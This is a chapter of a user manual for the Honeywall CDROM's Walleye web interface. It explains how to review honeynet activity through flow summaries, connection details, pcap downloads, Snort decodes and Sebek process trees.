|
7. Data Analysis
- Overview
- Summary
- Flows
- Details
- Sebek
- Future
7.1
Overview
When you get down to it, the entire purpose
of a deploying a honeynet is to collect data. However, that
data has no value if you cannot analyze it. This was one of
the greatest weakneses of the previous Honeywall
Eeyore, it had no simple way to analyze all that great
data. We hope we have solved that problem with Walleye,
the new Web based user interface to the Honeywall CDROM. To
connect to the Walleye interface, type the following in
your browser (notice this is a secured connection using SSL).
https://ip-address-mgmt-interface
Accessing the Data
Analysis section is the same as accessing the System
Admin section section described in Section
6: Maintaining. You will then be prompted to login. If
this is the first time you have logged in, the default user is
roo and password honey. You will then be
prompted to change the password. If you have already logged in
before, you will need to use the updated login and password.
Once you have gained access, the user interface defaults to
the data
analysis summary section.
7.2 Summary
When
you first come to the data anlysis section, you get the summary
page. This page shows by default your Sensor summary, and
a temporary IP search option (better one is currently under
development). The sensor section gives you an overview of the
activity the honeywall sees. Sensor identification is based on
the management IP address of your Honeywall. If you change the
IP address of your Honeywall, you will have multiple sensors
listed (there is no way to delete old ones). This is a known
issues. We are planning in the future for Walleye to
support multiple honeynets. However, it currently supports
only the local Honeywall it is installed on.
The purpose of the summary page is to give an overview of
honeywall activity. The displayed data is a combination of
argus and snort data wich is grouped as either inbound or
outbound flows. The primary source of information is flow
information from argus. Anything listed as bidirectional is
defined as any flow for which we see data going in both
directions from Client to Server and Server to Client. Total
includes both bidirection and unidirectional flows (such as
inbound scans dropped by a firewall). In addition it shows IDS
alerts and network traffic. Anything in blue you can
click on for more information. For example, if you click on
the identification number of your Honeywall sensor, you will
get an more detailed
overview of all the activity on that sensor. The sensor
detail section provides administrative summary data about the
honeywall and a top talkers report for the last 24 hours. The
admin summary is geared towards distributed environments and
provides a description of the geographic and organizational
location of the honewyall. The top talkers reports shows the
25 most active sources for and destinations of network
connections. If you click on the connection section, it will
give you the flow view for those connections, if you do so on
the ids events, it will take you to the flow view and display
the flows that related to the ids events. If you click on the
host's IP address then you would go to a host summary page.
At the bottom is a menu for querying specific IP based
information. Its relatively self explanotory, as you can
search based on time/date, IP address and/or ports.
7.3 Flows
Flows
Section is where you can get started digging into the
details. Here you will see an overview of all inbound and
outbound connections and related activity. The user interface
starts by showing all the honeypots in order (by destination
IP adddress). You can sort the listing by any of the headers,
such as alerts, etc. If there are multiple pages, you can
access them from the top of the menu. At the bottom left of
the screen is the option to query the flows. Options include
filtering by type of traffic, bidirectional, from honeynet,
all time periods, and Sebek tracked. The filter section allows
you to refine your search by screening out uninteresting data.
For instance, you can ask the system to only show
bi-directional TCP connections initiated from the honeynet. If
you want detailed information on each and every flow for that
IP address, or you want the flows listed in order that they
happen, select the IP address of the system you are interested
in, or the Detailed option at the bottom left and
submit your query.
7.4 Details
This
will take you to the Details
Section section. Here you see connection listed in detail.
These connections are listed in the order they happened, with
the oldest at top and the newest connection at the bottom.
Each line contains detailed information about each connection,
including protocol type, number and bytes of of packets
involved, and OS type of src IP address initiating the
connection. Any Snort alerts related to the connection are
also listed. To the left of each connection you will see
several icons. If you do NOT have Sebek installed on the
honeypot, you will only see two icons for each connection, the
floppy disk and the magnifying glass. Each is explained below.
If you do have Sebek installed on the client, you will see an
additional two more icons on the left, these are described in
detail below in the Sebek section.
Floppy Icon: By clicking on this image, you will be
able to download in pcap format the data related to that
specific flow. Or, if you prefer, configure
your browser to launch your tool of choice to analyze
the pcap data, such as Ethereal. This is an excellent
way for detailed analysis.
Magnifying Glass Icon: By clicking on this image, you
are able to analyze the connection in more detail with
Snort. You get a Flows
Examination section, which allows you to analyze in more
detail any IDS alerts, and Snort packet
decode of the flow.
7.5 Sebek
The
new user interface Walleye also supports the
integration and analysis of Sebek data. However, it only works
with the latest version, specifically the 3.X branch of Sebek.
It does not work with older versions due to the new
capabilities added to Sebek client. The power of Sebek data is
that it captures all of the system activity and gives you the
ability to analyze what happened on the honeypot, even if the
attacker went in encrypted. You know you have Sebek data for a
flow when on the left column there are two additional icons,
specifically a blue arrorw and a graph tree. Each is explained
in more detail below.
Blue Arrow Icon: By clicking on this image, you get
all connections
related to that specific flow.
Graph Tree Icon" This is the most powerful of all
options. It allows you to analyze in details all system
activities, including processes, files opened, etc. The
first screen you get will be a visual
graph tree of all the processes and their childs. This
gives you a visual presentation of all the processes. You
can click on specific processes for more information and
drill down of the processes themselves. In addition, if you
click on the option at the top View Details for this
Process, you should get a detailed
listing of all the Opened Files and Read Activity.
7.6 Future
Of
all the functionality of the CDROM, the one that will go under
the most active development and change is the data analysis
user interface. We have a tremendous amount of features we are
attempting to add. Some of these include
- Suspicious Tracking: The ability to highlight any
suspicious connection indicating a compromise.
- Sebek Interface: Ability to quickly determine the
attacker's activities based on Sebek data, such as their
keystrokes, or recover files they uploaded.
- Reporting: Ability to generate reports on
activity
- Distributed: Ability to correlate and analyze
data from multiple honeynets.
<-Back
Home
Next->
|
